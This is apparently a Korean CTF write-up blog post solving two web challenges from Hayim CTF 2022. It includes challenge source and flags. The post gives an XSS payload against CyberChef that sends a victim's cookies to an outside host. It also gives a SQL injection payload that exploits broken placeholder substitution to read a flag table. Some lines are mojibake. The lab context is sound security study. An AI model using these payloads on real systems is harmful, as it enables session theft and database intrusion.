Hayim CTF 2022

2022. 5. 12. 23:02 · 🚩 CTF

 Cyberchef

문제 페이지는 위와 같다.

 

< app.js >

const express = require('express');
const bodyParser = require('body-parser');
const { checkRateLimit, checkUrl, visitUrl } = require('./utils');

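const app = express();

app.set('view engine', 'ejs');

// Form-encoded bodies only; with `extended: false` the parsed values are
// plain strings (or arrays of strings), never nested objects.
app.use(bodyParser.urlencoded({
  extended: false
}));

app.get('/', (req, res) => {
  res.render('index');
});

/**
 * Report endpoint: takes a URL from the form and has the headless browser
 * visit it. The URL is validated before the rate limit is consulted, so a
 * rejected URL does not consume the client's rate-limit slot.
 */
app.post('/report', (req, res) => {
  const url = req.body.url;

  if (!checkUrl(url)) {
    res.redirect('/?message=invalid argument');
  } else if (!checkRateLimit(req.ip)) {
    // NOTE(review): req.ip is the socket peer unless Express's `trust proxy`
    // is enabled; behind a reverse proxy every client would share one key.
    res.redirect('/?message=rate limited');
  } else {
    visitUrl(url)
      .then(() => res.redirect('/?message=reported'))
      .catch((err) => {
        // Without a rejection handler a failed visit left the request
        // hanging and surfaced only as an unhandled rejection.
        console.error('visitUrl failed', err);
        res.redirect('/?message=report failed');
      });
  }
});

app.listen(8001);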

< utils.js >

const webdriver = require('selenium-webdriver');
const capabilities = webdriver.Capabilities.chrome();

// Read once at module load; readFileSync throws, and the module fails to
// load, if /flag cannot be read.
const flag = require('fs').readFileSync('/flag', 'utf8').trim();

// All durations are in milliseconds.
const rateLimit = 30 * 1000;   // minimum gap between two accepted reports per key
const pageTimeout = 3 * 1000;  // WebDriver timeouts and the post-load dwell time
const urlPrefix = 'http://cyberchef:8000/';

// rate-limit key -> Date.now() of the last accepted report for that key
const timestamps = new Map();

/**
 * Resolves with undefined after `ms` milliseconds.
 * @param {number} ms - delay passed straight to setTimeout
 * @returns {Promise<void>}
 */
const sleep = (ms) => new Promise((resolve) => setTimeout(resolve, ms));

/**
 * Per-key rate limit: at most one accepted call per `rateLimit` ms.
 * An accepted call records the current time for the key; a rejected call
 * does not touch the map. Entries are never removed, so the map grows with
 * the number of distinct keys seen.
 *
 * @param {string} key - rate-limit bucket (app.js passes req.ip)
 * @returns {boolean} true if the call is accepted, false if rate limited
 */
const checkRateLimit = (key) => {
  const now = Date.now();
  const lastSeen = timestamps.get(key);

  if (lastSeen !== undefined && lastSeen > now - rateLimit) {
    return false;
  }

  timestamps.set(key, now);
  return true;
};

/**
 * Accepts a string that starts with `urlPrefix` and is at most 1024 chars.
 * This is a prefix check only: whatever follows the prefix (path, query
 * string, fragment) is not inspected.
 *
 * @param {unknown} url - raw form value
 * @returns {boolean}
 */
const checkUrl = (url) => {
  return typeof url === 'string'
    && url.startsWith(urlPrefix)
    && url.length <= 1024;
};

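/**
 * Opens a fresh remote Chrome session, plants the flag cookie on the
 * `urlPrefix` origin, loads `url`, waits `pageTimeout` ms and closes the
 * session.
 *
 * Always resolves with undefined, as the original did. Any WebDriver error
 * (for instance a page-load timeout thrown by driver.get) is logged rather
 * than leaving the promise unsettled, and the session is quit in every case
 * so remote browsers are not leaked.
 *
 * @param {string} url - already validated by checkUrl
 * @returns {Promise<void>}
 */
const visitUrl = async (url) => {
  const driver = new webdriver.Builder('chrome')
    .usingServer('http://selenium:4444/wd/hub/')
    .withCapabilities(capabilities)
    .build();

  try {
    // Navigate to the target origin first; WebDriver's addCookie applies to
    // the current document's origin. This first navigation runs with the
    // driver's default timeouts — the ones below are set afterwards.
    await driver.get(urlPrefix);

    // NOTE(review): the cookie is set without httpOnly, so page script can
    // read it through document.cookie — this is the challenge's intended
    // weakness, not an accident to "fix" here.
    await driver.manage().addCookie({
      name: 'flag',
      value: flag
    });

    await driver.manage().setTimeouts({
      implicit: pageTimeout,
      pageLoad: pageTimeout,
      script: pageTimeout
    });

    await driver.get(url);
    await sleep(pageTimeout);
  } catch (err) {
    console.error('visitUrl failed', err);
  } finally {
    await driver.quit().catch((err) => console.error('driver.quit failed', err));
  }
};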

// Public surface of this module; sleep, flag and the Map stay private.
module.exports = { checkRateLimit, checkUrl, visitUrl };

핵심 코드는 위와 같다. utils.js 파일에서 chromedriver로 접속하고자 하는 웹사이트에 접근하며 Cookie를 탈취해야 Flag를 얻을 수 있다.  문제 페이지 최상단 좌측에 Download CyberChef를 클릭해 소스코드를 보면 CyberChef_v9.32.3 버전을 사용한다. github에 cyberchef와 관련된 issues를 보면 XSS와 관련된 취약점들을 확인할 수 있었다.

위  recipe=Scatter_chart('Line%20feed','Space',false,'','','red%22%3E%3Cscript%3Ealert(%22XSS:%20%22%20%2B%20document.domain)%3C/script%3E',100,false)&input=MTAwLCAxMDA

ํŽ˜์ด๋กœ๋“œ๋ฅผ ์ง์ ‘ ๋Œ€์ž…ํ•˜๋ฉด XSS๊ฐ€ ํ„ฐ์ง€๋Š” ๊ฒƒ์„ ํ™•์ธํ•  ์ˆ˜ ์žˆ๋‹ค.

 

위 URL을 Report하여 Flag를 얻으면 된다.

 

Payload

http://cyberchef:8000/#recipe=Scatter_chart('Line%20feed','Space',false,'','','red%22%3E%3Cscript%3Elocation.href%3d%22https://payload.site/?%22%2Bdocument.cookie%3C/script%3E',100,false)&input=MTAwLCAxMDA

Flag

hsctf{fa98fe3d32b4302aff1c322c925238a9d935b636f265cbfdd798391ca9c5a905}


Not E

Main Page
Login Page

소스 코드를 봤더니 SQL Query문이 많이 보이는 것을 보아 SQL Injection을 의심했다. 마침 SQLi 문제를 위한 빌드업처럼 보이기도 했고.

flag table에 flag가 저장되어 있는 것을 확인하고 SQLi exploit 문제인 것을 확정.

 

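/**
 * GET renders the "new note" form; POST validates both fields, derives the
 * note id from md5(title + content) and inserts the row bound to the
 * session's login.
 *
 * NOTE(review): the safety of the '?' placeholders depends entirely on how
 * db.run binds them. If it substitutes parameters by string replacement
 * instead of driver-level binding, a '?' inside title or content shifts the
 * remaining bindings and the literal is spliced into the statement — the
 * behaviour this write-up reports. Prefer a driver that binds natively.
 */
app.all('/new', async (req, res, next) => {
  if (req.method !== 'POST') {
    return res.render('new', { auth: true });
  }

  const { title, content } = req.body;
  if (!checkParam(title) || !checkParam(content)) {
    return res.redirect('?message=invalid argument');
  }

  // The id is content-derived: the same title+content from any user collides.
  const noteId = md5(title + content);
  try {
    await db.run('insert into posts values (?, ?, ?, ?)', [ noteId, title, content, req.session.login ]);
  } catch (err) {
    // Express 4 does not catch rejections from async handlers; hand the
    // error to the error middleware instead of leaving the request hanging.
    return next(err);
  }

  return res.redirect('/?message=successfully created');
});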

/new endpoint에서 최하단 insert쿼리문을 보면 prepared statement를 "?"로 받는다. 도커로 같은 환경에서 테스트를 해봤더니 "?" 문자가 formatQuery로 인해 하나 더 추가되고 sql.replace('?', param)에 의해 빈 문자열인 ""로 대체되는 것을 확인하였다.

 

참고 자료 : https://jangjongmin.oopy.io/b32e4eba-7b35-4540-97bb-be242f16c5f8

 

예시)

Input : Insert INTO posts ("test", "1234?", "5678", "guest");
Output : Insert INTO posts ("test", "1234""", "5678", "guest");

이렇게 ?를 사용하면 "필터링 우회가 가능하므로 SQLi가 가능하다.

 

Payload

title : exploit
content : ,(SELECT * FROM flag), 'username');-- 

# Input : INSERT INTO posts VALUES ("note_id", "exploit", ", (SELECT * FROM flag), 'username'); -- ", "username");
# Output : INSERT INTO posts VALUES ("note_id", "exploit", (SELECT * FROM flag), 'username');-- "", "", ?);

Flag

hsctf{038d083216a920c589917b898ff41fd9611956b711035b30766ffaf2ae7f75f2}


 

์ €์ž‘์žํ‘œ์‹œ ๋น„์˜๋ฆฌ ๋ณ€๊ฒฝ๊ธˆ์ง€ (์ƒˆ์ฐฝ์—ด๋ฆผ)
'๐Ÿšฉ CTF' ์นดํ…Œ๊ณ ๋ฆฌ์˜ ๋‹ค๋ฅธ ๊ธ€
  • damCTF 2024 Web Writeup
  • HackfestCTF 2024 Web writeup
  • BalsnCTF 2023 Web Writeup
  • Insomni'hack 2022
Cronus
Cronus
Offensive Security Researcher
  • Cronus
    Cronus
    Striving to be the best.
    • ๋ถ„๋ฅ˜ ์ „์ฒด๋ณด๊ธฐ (251)
      • AboutMe (1)
      • Portfolio (1)
        • Things (1)
      • Bug Report (1)
      • ๐Ÿšฉ CTF (23)
        • Former Doc (9)
        • 2023 (9)
      • ๐Ÿ’ป Security (5)
      • ๐Ÿ–Œ๏ธ Theory (22)
        • WEB (9)
        • PWN (13)
      • ๐Ÿ“„ Project (6)
        • Edu_Siri (6)
      • Dreamhack (156)
        • WEB (95)
        • PWN (41)
        • Crypto (14)
        • ETC (6)
      • Wargame (22)
        • HackCTF (22)
      • Bug Bounty (1)
        • Hacking Zone (1)
      • Tips (7)
      • Development (2)
        • Machine Learning & Deep Lea.. (1)
      • Offensive Tools (1)
  • ๋ธ”๋กœ๊ทธ ๋ฉ”๋‰ด

    • ํ™ˆ
  • ๋งํฌ

  • ๊ณต์ง€์‚ฌํ•ญ

  • ์ธ๊ธฐ ๊ธ€

  • ํƒœ๊ทธ

    cache
    RCE
    justCTF
    Machine Learning
    bug hunter
    Text Summarization
    TFCCTF2022
    bug report
    GPNCTF
    TsukuCTF2022
    Remote Code Execution
    Crypto
    Ubuntu ๊ธฐ์ดˆ ์…‹ํŒ…
    cache poisoning
    ubuntu ๋ช…๋ น์–ด
    Ubuntu ๊ธฐ์ดˆ
    python
    pwntools
    Deep learning
    sqli
  • ์ตœ๊ทผ ๋Œ“๊ธ€

  • ์ตœ๊ทผ ๊ธ€

Cronus
Hayim CTF 2022
์ƒ๋‹จ์œผ๋กœ

ํ‹ฐ์Šคํ† ๋ฆฌํˆด๋ฐ”